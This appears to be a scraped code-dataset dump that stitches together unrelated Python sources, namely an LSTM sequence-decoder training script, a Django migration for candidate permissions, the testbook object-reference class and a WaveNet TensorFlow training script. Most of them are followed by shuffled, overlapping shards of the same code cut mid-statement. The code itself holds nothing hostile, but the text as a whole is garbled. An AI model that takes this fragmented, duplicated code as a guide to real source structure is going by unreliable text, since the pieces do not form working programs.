"forget gate start, end = n//4, n//2 input_biases[idx_b+1, idx] = np.linalg.norm(m[start: end], ord=2)",
"const=True, default=False) parser.add_argument('--tf_ratio', type=float, default=Range(0.0, 1.0), help=\"Teacher forcing ratio. Default=1, TF on\") parser.add_argument('--weight_decay',",
"target, target_lengths): import editdistance vocab = {0: \"A\", 1: \"C\", 2: \"G\", 3:",
"self.hidden_dim, self.num_layers, batch_first=True, bidirectional=self.bidirectional, dropout=self.dropout) # self.lstm_p = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True) def",
"########################################### ##### Decoder ############################# ########################################### #### LSTM random_value = random.random() out_decoder, decoder_hidden =",
"get_train_loader_trainVal(input_x_val, signal_len_val, input_y_val, label_len_val, input_y10_val, batch_size=batch_size, shuffle=True) if earlyStopping: # initialize the early_stopping",
"the following conditions are met: 1. Redistributions of source code must retain the",
"= fig.add_subplot(2, 2, i) for epoch in p.keys(): if epoch % print_epoch ==",
"bbox_inches=\"tight\") plt.close(\"all\") def plot_activations(input, pdf=None, print_epoch=50000, title=\"\"): sns.set(font_scale=1) fig = plt.figure(figsize=(13,4)) fig.subplots_adjust(left=0, right=1,"
] |
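The decoder above flips between feeding back the ground-truth symbol and its own greedy prediction according to teacher_forcing_ratio. A minimal, self-contained sketch of that mechanism follows; the class and variable names here (TinyDecoder and friends) are illustrative, not from the script above:

import random
import torch
import torch.nn as nn
import torch.nn.functional as F

class TinyDecoder(nn.Module):
    """Illustrative unrolled decoder: one LSTMCell step per output symbol."""
    def __init__(self, num_classes=5, hidden_dim=32):
        super().__init__()
        self.num_classes = num_classes
        self.cell = nn.LSTMCell(num_classes, hidden_dim)
        self.out = nn.Linear(hidden_dim, num_classes)

    def forward(self, targets, hidden, teacher_forcing_ratio=0.5):
        # targets: [batch, max_len] integer labels; hidden: (h, c) from an encoder
        batch, max_len = targets.shape
        inp = torch.zeros(batch, self.num_classes)           # SOS as an all-zero vector
        outputs = torch.zeros(max_len, batch, self.num_classes)
        for t in range(max_len):
            h, c = self.cell(inp, hidden)
            hidden = (h, c)
            logits = self.out(h)
            outputs[t] = F.log_softmax(logits, dim=1)
            if random.random() < teacher_forcing_ratio:
                # teacher forcing: feed the ground-truth symbol back in
                inp = F.one_hot(targets[:, t], self.num_classes).float()
            else:
                # free-running: feed the model's own greedy prediction back in
                inp = F.one_hot(logits.argmax(1), self.num_classes).float()
        return outputs, hidden

# usage
dec = TinyDecoder()
tgt = torch.randint(0, 5, (4, 7))                 # [batch=4, max_len=7]
h0 = (torch.zeros(4, 32), torch.zeros(4, 32))
out, _ = dec(tgt, h0, teacher_forcing_ratio=0.75)
print(out.shape)                                   # torch.Size([7, 4, 5])

Decaying the ratio during training, as the script does once training accuracy passes 0.35, weans the decoder off ground-truth inputs so that train-time and inference-time behaviour converge.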
# Generated by Django 3.1 on 2020-08-29 02:18

from django.db import migrations


class Migration(migrations.Migration):

    dependencies = [
        ('interview', '0003_auto_20200828_2215'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='candidate',
            options={
                'permissions': [
                    ('export', 'Can export candidate list'),
                    ('notify', 'notify interviewer for candidate review'),
                ],
                # '应聘者' is Chinese for "candidate"/"applicant"
                'verbose_name': '应聘者',
                'verbose_name_plural': '应聘者',
            },
        ),
    ]
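AlterModelOptions only rewrites model metadata, so this migration changes no database schema; it registers two custom permissions, export and notify, on the Candidate model. Django exposes custom model permissions as "<app_label>.<codename>", so they become 'interview.export' and 'interview.notify'. A hedged sketch of how such a permission is typically checked in a view (the view function and its body are illustrative, not from this project):

from django.contrib.auth.decorators import permission_required
from django.http import HttpResponse

@permission_required('interview.export', raise_exception=True)
def export_candidates(request):
    # build and return the CSV export here (hypothetical view body)
    return HttpResponse("ok")

# or imperatively, anywhere a request object is available:
# if request.user.has_perm('interview.notify'):
#     ...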
from .exceptions import (
    TestbookExecuteResultNotFoundError,
    TestbookAttributeError,
    TestbookSerializeError,
    TestbookRuntimeError
)
from .utils import random_varname
from .translators import PythonTranslator


class TestbookObjectReference:
    def __init__(self, tb, name):
        self.tb = tb
        self.name: str = name

    @property
    def _type(self):
        return self.tb.value(f"type({self.name}).__name__")

    def __repr__(self):
        return repr(self.tb.value(f"repr({self.name})"))

    def __getattr__(self, name):
        if self.tb.value(f"hasattr({self.name}, '{name}')"):
            return TestbookObjectReference(self.tb, f"{self.name}.{name}")

        raise TestbookAttributeError(f"'{self._type}' object has no attribute {name}")

    def __eq__(self, rhs):
        return self.tb.value(
            "{lhs} == {rhs}".format(lhs=self.name, rhs=PythonTranslator.translate(rhs))
        )

    def __len__(self):
        return self.tb.value(f"len({self.name})")

    def __iter__(self):
        iterobjectname = f"___iter_object_{random_varname()}"
        self.tb.inject(f"""
            {iterobjectname} = iter({self.name})
        """)
        return TestbookObjectReference(self.tb, iterobjectname)

    def __next__(self):
        try:
            return self.tb.value(f"next({self.name})")
        except TestbookRuntimeError as e:
            if e.eclass is StopIteration:
                raise StopIteration
            else:
                raise

    def __getitem__(self, key):
        try:
            return self.tb.value(f"{self.name}.__getitem__({PythonTranslator.translate(key)})")
        except TestbookRuntimeError as e:
            if e.eclass is TypeError:
                raise TypeError(e.evalue)
            elif e.eclass is IndexError:
                raise IndexError(e.evalue)
            else:
                raise

    def __setitem__(self, key, value):
        try:
            return self.tb.inject("{name}[{key}] = {value}".format(
                name=self.name,
                key=PythonTranslator.translate(key),
                value=PythonTranslator.translate(value)
            ), pop=True)
        except TestbookRuntimeError as e:
            if e.eclass is TypeError:
                raise TypeError(e.evalue)
            elif e.eclass is IndexError:
                raise IndexError(e.evalue)
            else:
                raise

    def __contains__(self, item):
        return self.tb.value(f"{self.name}.__contains__({PythonTranslator.translate(item)})")

    def __call__(self, *args, **kwargs):
        code = self.tb._construct_call_code(self.name, args, kwargs)
        try:
            return self.tb.value(code)
        except TestbookExecuteResultNotFoundError:
            # No return value from function call
            pass
        except TestbookSerializeError as e:
            return TestbookObjectReference(self.tb, e.save_varname)

    def resolve(self):
        return self.tb.value(self.name)
"name): if self.tb.value(f\"hasattr({self.name}, '{name}')\"): return TestbookObjectReference(self.tb, f\"{self.name}.{name}\") raise TestbookAttributeError(f\"'{self._type}' object has no attribute",
"is TypeError: raise TypeError(e.evalue) elif e.eclass is IndexError: raise IndexError(e.evalue) else: raise def",
"e.eclass is IndexError: raise IndexError(e.evalue) else: raise def __setitem__(self, key, value): try: return",
"f\"{self.name}.{name}\") raise TestbookAttributeError(f\"'{self._type}' object has no attribute {name}\") def __eq__(self, rhs): return self.tb.value(",
"try: return self.tb.inject(\"{name}[{key}] = {value}\".format( name=self.name, key=PythonTranslator.translate(key), value=PythonTranslator.translate(value) ), pop=True) except TestbookRuntimeError as",
"self.tb.value(f\"hasattr({self.name}, '{name}')\"): return TestbookObjectReference(self.tb, f\"{self.name}.{name}\") raise TestbookAttributeError(f\"'{self._type}' object has no attribute {name}\") def",
"self.name: str = name @property def _type(self): return self.tb.value(f\"type({self.name}).__name__\") def __repr__(self): return repr(self.tb.value(f\"repr({self.name})\"))",
"= name @property def _type(self): return self.tb.value(f\"type({self.name}).__name__\") def __repr__(self): return repr(self.tb.value(f\"repr({self.name})\")) def __getattr__(self,",
"TestbookObjectReference(self.tb, f\"{self.name}.{name}\") raise TestbookAttributeError(f\"'{self._type}' object has no attribute {name}\") def __eq__(self, rhs): return",
"<reponame>loichuder/testbook from .exceptions import ( TestbookExecuteResultNotFoundError, TestbookAttributeError, TestbookSerializeError, TestbookRuntimeError ) from .utils import",
"raise def __contains__(self, item): return self.tb.value(f\"{self.name}.__contains__({PythonTranslator.translate(item)})\") def __call__(self, *args, **kwargs): code = self.tb._construct_call_code(self.name,",
"= tb self.name: str = name @property def _type(self): return self.tb.value(f\"type({self.name}).__name__\") def __repr__(self):",
"kwargs) try: return self.tb.value(code) except TestbookExecuteResultNotFoundError: # No return value from function call",
"self.tb = tb self.name: str = name @property def _type(self): return self.tb.value(f\"type({self.name}).__name__\") def",
"return TestbookObjectReference(self.tb, iterobjectname) def __next__(self): try: return self.tb.value(f\"next({self.name})\") except TestbookRuntimeError as e: if",
"IndexError: raise IndexError(e.evalue) else: raise def __setitem__(self, key, value): try: return self.tb.inject(\"{name}[{key}] =",
"return self.tb.value(f\"type({self.name}).__name__\") def __repr__(self): return repr(self.tb.value(f\"repr({self.name})\")) def __getattr__(self, name): if self.tb.value(f\"hasattr({self.name}, '{name}')\"): return",
"{value}\".format( name=self.name, key=PythonTranslator.translate(key), value=PythonTranslator.translate(value) ), pop=True) except TestbookRuntimeError as e: if e.eclass is",
"key=PythonTranslator.translate(key), value=PythonTranslator.translate(value) ), pop=True) except TestbookRuntimeError as e: if e.eclass is TypeError: raise",
"try: return self.tb.value(code) except TestbookExecuteResultNotFoundError: # No return value from function call pass",
"value): try: return self.tb.inject(\"{name}[{key}] = {value}\".format( name=self.name, key=PythonTranslator.translate(key), value=PythonTranslator.translate(value) ), pop=True) except TestbookRuntimeError",
"= iter({self.name}) \"\"\") return TestbookObjectReference(self.tb, iterobjectname) def __next__(self): try: return self.tb.value(f\"next({self.name})\") except TestbookRuntimeError",
"try: return self.tb.value(f\"next({self.name})\") except TestbookRuntimeError as e: if e.eclass is StopIteration: raise StopIteration",
"TestbookExecuteResultNotFoundError, TestbookAttributeError, TestbookSerializeError, TestbookRuntimeError ) from .utils import random_varname from .translators import PythonTranslator",
"{name}\") def __eq__(self, rhs): return self.tb.value( \"{lhs} == {rhs}\".format(lhs=self.name, rhs=PythonTranslator.translate(rhs)) ) def __len__(self):",
"return repr(self.tb.value(f\"repr({self.name})\")) def __getattr__(self, name): if self.tb.value(f\"hasattr({self.name}, '{name}')\"): return TestbookObjectReference(self.tb, f\"{self.name}.{name}\") raise TestbookAttributeError(f\"'{self._type}'",
"TestbookObjectReference(self.tb, iterobjectname) def __next__(self): try: return self.tb.value(f\"next({self.name})\") except TestbookRuntimeError as e: if e.eclass",
"**kwargs): code = self.tb._construct_call_code(self.name, args, kwargs) try: return self.tb.value(code) except TestbookExecuteResultNotFoundError: # No",
"return self.tb.inject(\"{name}[{key}] = {value}\".format( name=self.name, key=PythonTranslator.translate(key), value=PythonTranslator.translate(value) ), pop=True) except TestbookRuntimeError as e:",
"def __getattr__(self, name): if self.tb.value(f\"hasattr({self.name}, '{name}')\"): return TestbookObjectReference(self.tb, f\"{self.name}.{name}\") raise TestbookAttributeError(f\"'{self._type}' object has",
"raise TypeError(e.evalue) elif e.eclass is IndexError: raise IndexError(e.evalue) else: raise def __setitem__(self, key,",
"tb, name): self.tb = tb self.name: str = name @property def _type(self): return",
"\"{lhs} == {rhs}\".format(lhs=self.name, rhs=PythonTranslator.translate(rhs)) ) def __len__(self): return self.tb.value(f\"len({self.name})\") def __iter__(self): iterobjectname =",
"return self.tb.value(f\"len({self.name})\") def __iter__(self): iterobjectname = f\"___iter_object_{random_varname()}\" self.tb.inject(f\"\"\" {iterobjectname} = iter({self.name}) \"\"\") return",
"return self.tb.value( \"{lhs} == {rhs}\".format(lhs=self.name, rhs=PythonTranslator.translate(rhs)) ) def __len__(self): return self.tb.value(f\"len({self.name})\") def __iter__(self):",
"as e: if e.eclass is StopIteration: raise StopIteration else: raise def __getitem__(self, key):",
"elif e.eclass is IndexError: raise IndexError(e.evalue) else: raise def __setitem__(self, key, value): try:",
"from .exceptions import ( TestbookExecuteResultNotFoundError, TestbookAttributeError, TestbookSerializeError, TestbookRuntimeError ) from .utils import random_varname",
"self.tb.value(f\"{self.name}.__getitem__({PythonTranslator.translate(key)})\") except TestbookRuntimeError as e: if e.eclass is TypeError: raise TypeError(e.evalue) elif e.eclass",
"key): try: return self.tb.value(f\"{self.name}.__getitem__({PythonTranslator.translate(key)})\") except TestbookRuntimeError as e: if e.eclass is TypeError: raise",
") from .utils import random_varname from .translators import PythonTranslator class TestbookObjectReference: def __init__(self,",
"from .translators import PythonTranslator class TestbookObjectReference: def __init__(self, tb, name): self.tb = tb",
"rhs): return self.tb.value( \"{lhs} == {rhs}\".format(lhs=self.name, rhs=PythonTranslator.translate(rhs)) ) def __len__(self): return self.tb.value(f\"len({self.name})\") def",
"__next__(self): try: return self.tb.value(f\"next({self.name})\") except TestbookRuntimeError as e: if e.eclass is StopIteration: raise",
"else: raise def __getitem__(self, key): try: return self.tb.value(f\"{self.name}.__getitem__({PythonTranslator.translate(key)})\") except TestbookRuntimeError as e: if",
"e: if e.eclass is StopIteration: raise StopIteration else: raise def __getitem__(self, key): try:",
"self.tb.value(f\"len({self.name})\") def __iter__(self): iterobjectname = f\"___iter_object_{random_varname()}\" self.tb.inject(f\"\"\" {iterobjectname} = iter({self.name}) \"\"\") return TestbookObjectReference(self.tb,",
"self.tb.value(f\"next({self.name})\") except TestbookRuntimeError as e: if e.eclass is StopIteration: raise StopIteration else: raise",
"= f\"___iter_object_{random_varname()}\" self.tb.inject(f\"\"\" {iterobjectname} = iter({self.name}) \"\"\") return TestbookObjectReference(self.tb, iterobjectname) def __next__(self): try:",
"\"\"\") return TestbookObjectReference(self.tb, iterobjectname) def __next__(self): try: return self.tb.value(f\"next({self.name})\") except TestbookRuntimeError as e:",
"name): self.tb = tb self.name: str = name @property def _type(self): return self.tb.value(f\"type({self.name}).__name__\")",
"try: return self.tb.value(f\"{self.name}.__getitem__({PythonTranslator.translate(key)})\") except TestbookRuntimeError as e: if e.eclass is TypeError: raise TypeError(e.evalue)",
"self.tb.inject(f\"\"\" {iterobjectname} = iter({self.name}) \"\"\") return TestbookObjectReference(self.tb, iterobjectname) def __next__(self): try: return self.tb.value(f\"next({self.name})\")",
"__setitem__(self, key, value): try: return self.tb.inject(\"{name}[{key}] = {value}\".format( name=self.name, key=PythonTranslator.translate(key), value=PythonTranslator.translate(value) ), pop=True)",
"raise StopIteration else: raise def __getitem__(self, key): try: return self.tb.value(f\"{self.name}.__getitem__({PythonTranslator.translate(key)})\") except TestbookRuntimeError as",
"from function call pass except TestbookSerializeError as e: return TestbookObjectReference(self.tb, e.save_varname) def resolve(self):",
"import random_varname from .translators import PythonTranslator class TestbookObjectReference: def __init__(self, tb, name): self.tb",
"if e.eclass is TypeError: raise TypeError(e.evalue) elif e.eclass is IndexError: raise IndexError(e.evalue) else:",
"iterobjectname) def __next__(self): try: return self.tb.value(f\"next({self.name})\") except TestbookRuntimeError as e: if e.eclass is",
"str = name @property def _type(self): return self.tb.value(f\"type({self.name}).__name__\") def __repr__(self): return repr(self.tb.value(f\"repr({self.name})\")) def"
] |
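# ---------------------------------------------------------------------------
# A minimal usage sketch, assuming testbook's public API (the @testbook
# decorator and tb.ref). The notebook path and the names `df` / `price`
# below are hypothetical, purely for illustration.
# ---------------------------------------------------------------------------
from testbook import testbook

@testbook('notebooks/example.ipynb', execute=True)  # hypothetical notebook
def test_reference(tb):
    # tb.ref(...) hands back a TestbookObjectReference when the kernel-side
    # object cannot be serialized back into the test process.
    df = tb.ref("df")        # hypothetical variable defined in the notebook
    assert len(df) > 0       # routed through __len__  -> len(df) in the kernel
    assert "price" in df     # routed through __contains__
    _ = df["price"]          # routed through __getitem__; kernel-side TypeError/
                             # IndexError are re-raised locally with their message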
"""Training script for the WaveNet network on the VCTK corpus.

This script trains a network with the WaveNet using data from the VCTK
corpus, which can be freely downloaded at the following site (~10 GB):
http://homepages.inf.ed.ac.uk/jyamagis/page3/page58/page58.html
"""
from __future__ import print_function

import argparse
import glob
import json
from dataclasses import dataclass
import numpy as np
import os
import sys
import time
from datetime import datetime
from pathlib import Path

import tensorflow as tf
from tensorflow.python.client import timeline
from tqdm.auto import tqdm

from wavenet_tf import WaveNetModel, optimizer_factory
from wavenet_tf.data_io import get_train_dataset

ROOT_DIR = Path(os.path.abspath(__file__)).parent.parent
STARTED_DATESTRING = "{0:%Y-%m-%dT%H-%M-%S}".format(datetime.now())


@dataclass
class TrainParams:
    data_dir: str = str(ROOT_DIR / 'data' / 'fma_small_25_16000')
    log_dir: str = str(ROOT_DIR / "logdir")
    checkpoint_every: int = 1000
    num_steps: int = int(1e5)
    batch_size: int = 1
    sample_size: int = 100000
    learning_rate: float = 1e-4
    max_to_keep: int = 5
    store_metadata: bool = False
    l2_regularization_strength: float = 0.0
    max_checkpoints: int = 5


def train(args: TrainParams, net, optimizer):
    # Load raw waveform from VCTK corpus.
    with tf.name_scope('create_inputs'):
        # Allow silence trimming to be skipped by specifying a threshold near zero.
        dataset, n_examples = get_train_dataset(os.path.join(args.data_dir, "*.npz"),
                                                args.sample_size)
        epoch_size = n_examples // args.batch_size
        dataset = dataset.repeat().batch(args.batch_size)
        iterator = tf.compat.v1.data.make_initializable_iterator(dataset)
        audio_batch = iterator.get_next()

    if args.l2_regularization_strength == 0:
        args.l2_regularization_strength = None
    loss = net.loss(input_batch=audio_batch,
                    global_condition_batch=None,
                    l2_regularization_strength=args.l2_regularization_strength)
    trainable = tf.compat.v1.trainable_variables()
    optim = optimizer.minimize(loss, var_list=trainable)

    # Set up logging for TensorBoard.
    writer = tf.compat.v1.summary.FileWriter(args.log_dir)
    writer.add_graph(tf.compat.v1.get_default_graph())
    run_metadata = tf.compat.v1.RunMetadata()
    summaries = tf.compat.v1.summary.merge_all()

    # Set up session
    sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(log_device_placement=False))
    init = tf.compat.v1.global_variables_initializer()
    sess.run(init)
    sess.run(iterator.initializer)

    # Saver for storing checkpoints of the model.
    saver = tf.compat.v1.train.Saver(var_list=tf.compat.v1.trainable_variables(),
                                     max_to_keep=args.max_checkpoints)

    try:
        saved_global_step = load(saver, sess, args.log_dir)
        if saved_global_step is None:
            # The first training step will be saved_global_step + 1,
            # therefore we put -1 here for new or overwritten trainings.
            saved_global_step = -1
    except:
        print("Something went wrong while restoring checkpoint. "
              "We will terminate training to avoid accidentally overwriting "
              "the previous model.")
        raise

    step = None
    last_saved_step = saved_global_step
    try:
        total = args.num_steps - saved_global_step - 1
        pbar = tqdm(
            total=total,
            initial=saved_global_step + 1,
            desc=f'train (epoch-size={epoch_size}, #epoch={total // epoch_size})')
        for step in range(saved_global_step + 1, args.num_steps):
            if args.store_metadata and step % 50 == 0:
                # Slow run that stores extra information for debugging.
                print('Storing metadata')
                run_options = tf.RunOptions(
                    trace_level=tf.RunOptions.FULL_TRACE)
                summary, loss_value, _ = sess.run(
                    [summaries, loss, optim],
                    options=run_options,
                    run_metadata=run_metadata)
                writer.add_summary(summary, step)
                writer.add_run_metadata(run_metadata, 'step_{:04d}'.format(step))
                tl = timeline.Timeline(run_metadata.step_stats)
                timeline_path = os.path.join(args.log_dir, 'timeline.trace')
                with open(timeline_path, 'w') as f:
                    f.write(tl.generate_chrome_trace_format(show_memory=True))
            else:
                summary, loss_value, _ = sess.run([summaries, loss, optim])
                writer.add_summary(summary, step)

            pbar.update(1)
            pbar.set_postfix(step=step, loss=loss_value, epoch=step // epoch_size)

            if step > 0 and step % args.checkpoint_every == 0:
                save(saver, sess, args.log_dir, step)
                last_saved_step = step

    except KeyboardInterrupt:
        # Introduce a line break after ^C is displayed so save message
        # is on its own line.
        print()
    finally:
        # Guard against an interrupt before the first step, when `step` is still None.
        if step is not None and step > last_saved_step:
            save(saver, sess, args.log_dir, step)


def save(saver, sess, logdir, step):
    model_name = 'model.ckpt'
    checkpoint_path = os.path.join(logdir, model_name)
    print('Storing checkpoint to {} ...'.format(logdir), end="")
    sys.stdout.flush()

    if not os.path.exists(logdir):
        os.makedirs(logdir)

    saver.save(sess, checkpoint_path, global_step=step)
    print(' Done.')


def load(saver, sess, logdir):
    print("Trying to restore saved checkpoints from {} ...".format(logdir), end="")

    ckpt = tf.train.get_checkpoint_state(logdir)
    if ckpt:
        print(" Checkpoint found: {}".format(ckpt.model_checkpoint_path))
        global_step = int(ckpt.model_checkpoint_path
                          .split('/')[-1]
                          .split('-')[-1])
        print(" Global step was: {}".format(global_step))
        print(" Restoring...", end="")
        saver.restore(sess, ckpt.model_checkpoint_path)
        print(" Done.")
        return global_step
    else:
        print(" No checkpoint found.")
        return None


def get_default_logdir(logdir_root):
    logdir = os.path.join(logdir_root, 'train', STARTED_DATESTRING)
    return logdir


if __name__ == '__main__':
    args = TrainParams()
    with open('./data/tf_wavenet_params.json', 'r') as f:
        wavenet_params = json.load(f)
    model = WaveNetModel(
        batch_size=args.batch_size,
        dilations=wavenet_params["dilations"],
        filter_width=wavenet_params["filter_width"],
        residual_channels=wavenet_params["residual_channels"],
        dilation_channels=wavenet_params["dilation_channels"],
        skip_channels=wavenet_params["skip_channels"],
        quantization_channels=wavenet_params["quantization_channels"],
        use_biases=wavenet_params["use_biases"],
        scalar_input=wavenet_params["scalar_input"],
        initial_filter_width=wavenet_params["initial_filter_width"],
        histograms=False,
        global_condition_channels=None,
        global_condition_cardinality=None)
    optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=1e-4, epsilon=1e-4)
    train(args, model, optimizer)
"GB): http://homepages.inf.ed.ac.uk/jyamagis/page3/page58/page58.html \"\"\" from __future__ import print_function import argparse import glob import json",
"'r') as f: wavenet_params = json.load(f) model = WaveNetModel( batch_size=args.batch_size, dilations=wavenet_params[\"dilations\"], filter_width=wavenet_params[\"filter_width\"], residual_channels=wavenet_params[\"residual_channels\"],",
"the WaveNet using data from the VCTK corpus, which can be freely downloaded",
"tf from tensorflow.python.client import timeline from tqdm.auto import tqdm from wavenet_tf import WaveNetModel,",
"get_train_dataset(os.path.join(args.data_dir, \"*.npz\"), args.sample_size) epoch_size = n_examples // args.batch_size dataset = dataset.repeat().batch(args.batch_size) iterator =",
"1 sample_size: int = 100000 learning_rate: float = 1e-4 max_to_keep: int = 5",
"int = 1000 num_steps: int = int(1e5) batch_size: int = 1 sample_size: int",
"if step > last_saved_step: save(saver, sess, args.log_dir, step) def save(saver, sess, logdir, step):",
"= 100000 learning_rate: float = 1e-4 max_to_keep: int = 5 store_metadata: bool =",
"logdir): print(\"Trying to restore saved checkpoints from {} ...\".format(logdir), end=\"\") ckpt = tf.train.get_checkpoint_state(logdir)",
"to {} ...'.format(logdir), end=\"\") sys.stdout.flush() if not os.path.exists(logdir): os.makedirs(logdir) saver.save(sess, checkpoint_path, global_step=step) print('",
"Global step was: {}\".format(global_step)) print(\" Restoring...\", end=\"\") saver.restore(sess, ckpt.model_checkpoint_path) print(\" Done.\") return global_step",
"# Set up logging for TensorBoard. writer = tf.compat.v1.summary.FileWriter(args.log_dir) writer.add_graph(tf.compat.v1.get_default_graph()) run_metadata = tf.compat.v1.RunMetadata()",
"end=\"\") sys.stdout.flush() if not os.path.exists(logdir): os.makedirs(logdir) saver.save(sess, checkpoint_path, global_step=step) print(' Done.') def load(saver,",
"\"{0:%Y-%m-%dT%H-%M-%S}\".format(datetime.now()) @dataclass class TrainParams: data_dir: str = str(ROOT_DIR / 'data' / 'fma_small_25_16000') log_dir:",
"os.path.exists(logdir): os.makedirs(logdir) saver.save(sess, checkpoint_path, global_step=step) print(' Done.') def load(saver, sess, logdir): print(\"Trying to",
"5 def train(args: TrainParams, net, optimizer): # Load raw waveform from VCTK corpus.",
"= os.path.join(logdir_root, 'train', STARTED_DATESTRING) return logdir if __name__ == '__main__': args = TrainParams()",
"__future__ import print_function import argparse import glob import json from dataclasses import dataclass",
"dataclasses import dataclass import numpy as np import os import sys import time",
"import get_train_dataset ROOT_DIR = Path(os.path.abspath(__file__)).parent.parent STARTED_DATESTRING = \"{0:%Y-%m-%dT%H-%M-%S}\".format(datetime.now()) @dataclass class TrainParams: data_dir: str",
"trainings. saved_global_step = -1 except: print(\"Something went wrong while restoring checkpoint. \" \"We",
"f: f.write(tl.generate_chrome_trace_format(show_memory=True)) else: summary, loss_value, _ = sess.run([summaries, loss, optim]) writer.add_summary(summary, step) pbar.update(1)",
"print(\" Restoring...\", end=\"\") saver.restore(sess, ckpt.model_checkpoint_path) print(\" Done.\") return global_step else: print(\" No checkpoint",
"= json.load(f) model = WaveNetModel( batch_size=args.batch_size, dilations=wavenet_params[\"dilations\"], filter_width=wavenet_params[\"filter_width\"], residual_channels=wavenet_params[\"residual_channels\"], dilation_channels=wavenet_params[\"dilation_channels\"], skip_channels=wavenet_params[\"skip_channels\"], quantization_channels=wavenet_params[\"quantization_channels\"], use_biases=wavenet_params[\"use_biases\"],",
"Load raw waveform from VCTK corpus. with tf.name_scope('create_inputs'): # Allow silence trimming to",
"= \"{0:%Y-%m-%dT%H-%M-%S}\".format(datetime.now()) @dataclass class TrainParams: data_dir: str = str(ROOT_DIR / 'data' / 'fma_small_25_16000')",
"epoch_size})') for step in range(saved_global_step + 1, args.num_steps): if args.store_metadata and step %",
"'model.ckpt' checkpoint_path = os.path.join(logdir, model_name) print('Storing checkpoint to {} ...'.format(logdir), end=\"\") sys.stdout.flush() if",
".split('/')[-1] .split('-')[-1]) print(\" Global step was: {}\".format(global_step)) print(\" Restoring...\", end=\"\") saver.restore(sess, ckpt.model_checkpoint_path) print(\"",
"TrainParams: data_dir: str = str(ROOT_DIR / 'data' / 'fma_small_25_16000') log_dir: str = str(ROOT_DIR",
"\"\"\" from __future__ import print_function import argparse import glob import json from dataclasses",
"= TrainParams() with open('./data/tf_wavenet_params.json', 'r') as f: wavenet_params = json.load(f) model = WaveNetModel(",
"learning_rate: float = 1e-4 max_to_keep: int = 5 store_metadata: bool = False l2_regularization_strength:",
"load(saver, sess, logdir): print(\"Trying to restore saved checkpoints from {} ...\".format(logdir), end=\"\") ckpt",
"saver.save(sess, checkpoint_path, global_step=step) print(' Done.') def load(saver, sess, logdir): print(\"Trying to restore saved",
"sys.stdout.flush() if not os.path.exists(logdir): os.makedirs(logdir) saver.save(sess, checkpoint_path, global_step=step) print(' Done.') def load(saver, sess,",
"store_metadata: bool = False l2_regularization_strength: float = 0.0 max_checkpoints: int = 5 def",
"n_examples = get_train_dataset(os.path.join(args.data_dir, \"*.npz\"), args.sample_size) epoch_size = n_examples // args.batch_size dataset = dataset.repeat().batch(args.batch_size)",
"to be skipped by specifying a threshold near dataset, n_examples = get_train_dataset(os.path.join(args.data_dir, \"*.npz\"),",
"last_saved_step = step except KeyboardInterrupt: # Introduce a line break after ^C is",
"sess.run(init) sess.run(iterator.initializer) # Saver for storing checkpoints of the model. saver = tf.compat.v1.train.Saver(var_list=tf.compat.v1.trainable_variables(),",
"print('Storing checkpoint to {} ...'.format(logdir), end=\"\") sys.stdout.flush() if not os.path.exists(logdir): os.makedirs(logdir) saver.save(sess, checkpoint_path,",
"saved_global_step is None: # The first training step will be saved_global_step + 1,",
"import argparse import glob import json from dataclasses import dataclass import numpy as",
"near dataset, n_examples = get_train_dataset(os.path.join(args.data_dir, \"*.npz\"), args.sample_size) epoch_size = n_examples // args.batch_size dataset",
"args.l2_regularization_strength = None loss = net.loss(input_batch=audio_batch, global_condition_batch=None, l2_regularization_strength=args.l2_regularization_strength) trainable = tf.compat.v1.trainable_variables() optim =",
"WaveNet using data from the VCTK corpus, which can be freely downloaded at",
"quantization_channels=wavenet_params[\"quantization_channels\"], use_biases=wavenet_params[\"use_biases\"], scalar_input=wavenet_params[\"scalar_input\"], initial_filter_width=wavenet_params[\"initial_filter_width\"], histograms=False, global_condition_channels=None, global_condition_cardinality=None) optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=1e-4, epsilon=1e-4) train(args, model,",
"float = 1e-4 max_to_keep: int = 5 store_metadata: bool = False l2_regularization_strength: float",
"after ^C is displayed so save message # is on its own line.",
"= tf.compat.v1.global_variables_initializer() sess.run(init) sess.run(iterator.initializer) # Saver for storing checkpoints of the model. saver",
"step % 50 == 0: # Slow run that stores extra information for",
"os.path.join(logdir_root, 'train', STARTED_DATESTRING) return logdir if __name__ == '__main__': args = TrainParams() with",
"tqdm( total=total, initial=saved_global_step + 1, desc=f'train (epoch-size={epoch_size}, #epoch={total // epoch_size})') for step in",
"optim = optimizer.minimize(loss, var_list=trainable) # Set up logging for TensorBoard. writer = tf.compat.v1.summary.FileWriter(args.log_dir)",
"== 0: args.l2_regularization_strength = None loss = net.loss(input_batch=audio_batch, global_condition_batch=None, l2_regularization_strength=args.l2_regularization_strength) trainable = tf.compat.v1.trainable_variables()",
"args.log_dir, step) last_saved_step = step except KeyboardInterrupt: # Introduce a line break after",
"= 1e-4 max_to_keep: int = 5 store_metadata: bool = False l2_regularization_strength: float =",
"#epoch={total // epoch_size})') for step in range(saved_global_step + 1, args.num_steps): if args.store_metadata and",
"step was: {}\".format(global_step)) print(\" Restoring...\", end=\"\") saver.restore(sess, ckpt.model_checkpoint_path) print(\" Done.\") return global_step else:",
"= 5 def train(args: TrainParams, net, optimizer): # Load raw waveform from VCTK",
"as np import os import sys import time from datetime import datetime from",
"# Allow silence trimming to be skipped by specifying a threshold near dataset,",
"loss = net.loss(input_batch=audio_batch, global_condition_batch=None, l2_regularization_strength=args.l2_regularization_strength) trainable = tf.compat.v1.trainable_variables() optim = optimizer.minimize(loss, var_list=trainable) #",
"(~10 GB): http://homepages.inf.ed.ac.uk/jyamagis/page3/page58/page58.html \"\"\" from __future__ import print_function import argparse import glob import",
"argparse import glob import json from dataclasses import dataclass import numpy as np",
"= tf.train.get_checkpoint_state(logdir) if ckpt: print(\" Checkpoint found: {}\".format(ckpt.model_checkpoint_path)) global_step = int(ckpt.model_checkpoint_path .split('/')[-1] .split('-')[-1])",
"import timeline from tqdm.auto import tqdm from wavenet_tf import WaveNetModel, optimizer_factory from wavenet_tf.data_io",
"so save message # is on its own line. print() finally: if step",
"writer.add_graph(tf.compat.v1.get_default_graph()) run_metadata = tf.compat.v1.RunMetadata() summaries = tf.compat.v1.summary.merge_all() # Set up session sess =",
"dataset, n_examples = get_train_dataset(os.path.join(args.data_dir, \"*.npz\"), args.sample_size) epoch_size = n_examples // args.batch_size dataset =",
